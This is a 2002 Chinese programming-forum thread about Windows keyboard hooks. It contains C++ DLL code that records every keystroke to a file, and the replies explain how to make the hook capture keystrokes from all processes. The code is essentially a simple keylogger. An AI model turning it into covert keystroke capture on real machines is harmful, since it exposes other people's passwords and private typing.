dll问题1

wwwaj 2002-05-17 09:25:34
void WINAPI InstallLaucher()
{
CFileException e;
char* pFileName = "D:\\chap19\\work\\test.dat";
if( !fp.Open( pFileName, CFile::modeCreate | CFile::modeWrite, &e ) )
{
#ifdef _DEBUG
afxDump << "File could not be opened " << e.m_cause << "\n";
#endif
}
Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook,theApp.m_hInstance,0);

}

LRESULT CALLBACK LauncherHook(int nCode,WORD wParam,DWORD lParam)
{

LRESULT Result=CallNextHookEx(Hook,nCode,wParam,lParam);

char aa[1];
aa[0]=(char)wParam;
if(nCode==HC_ACTION)
{
if(lParam & 0x80000000)
{
fp.Write(aa,1);
Result=0;
};
};
return Result;
}
以上是以动态库所用的两函数,主程序调用InstallLaucher, 钩键盘,可只能钩本进程的,其他程序的击键,不能钩住,不知为何,能帮一下吗?谢谢!
...全文
45 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
wwwaj 2002-05-21
  • 打赏
  • 举报
回复
InstallLaucher() LauncherHook(...),,两个函数是在动态库里,主程序去掉用InstallLaucher()
Hover 2002-05-18
  • 打赏
  • 举报
回复
这句改成
Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook,NULL,0);
loyee 2002-05-18
  • 打赏
  • 举报
回复
全局HOOK的HOOKPROC必须放在全局地址空间,常用的方法是把HOOKPROC实现在DLL里面,用GetProcAddress(...)取得HOOKPROC指针然后传给SetWindowsHookEx(...).

你的例子中必须把LauncherHook(...)放到一个DLL中实现.
wwwaj 2002-05-17
  • 打赏
  • 举报
回复
我试一下
joy8223 2002-05-17
  • 打赏
  • 举报
回复
你在void WINAPI InstallLaucher()传个参数试试
void WINAPI InstallLaucher(HINSTANCE hInstance)
Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook,hInstance,0);
然后在调用的时候传入该HINSTANCE,看看行不

16,472

社区成员

发帖
与我相关
我的任务
社区描述
VC/MFC相关问题讨论
社区管理员
  • 基础类社区
  • Web++
  • encoderlee
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

        VC/MFC社区版块或许是CSDN最“古老”的版块了,记忆之中,与CSDN的年龄几乎差不多。随着时间的推移,MFC技术渐渐的偏离了开发主流,若干年之后的今天,当我们面对着微软的这个经典之笔,内心充满着敬意,那些曾经的记忆,可以说代表着二十年前曾经的辉煌……
        向经典致敬,或许是老一代程序员内心里面难以释怀的感受。互联网大行其道的今天,我们期待着MFC技术能够恢复其曾经的辉煌,或许这个期待会永远成为一种“梦想”,或许一切皆有可能……
        我们希望这个版块可以很好的适配Web时代,期待更好的互联网技术能够使得MFC技术框架得以重现活力,……

试试用AI创作助手写篇文章吧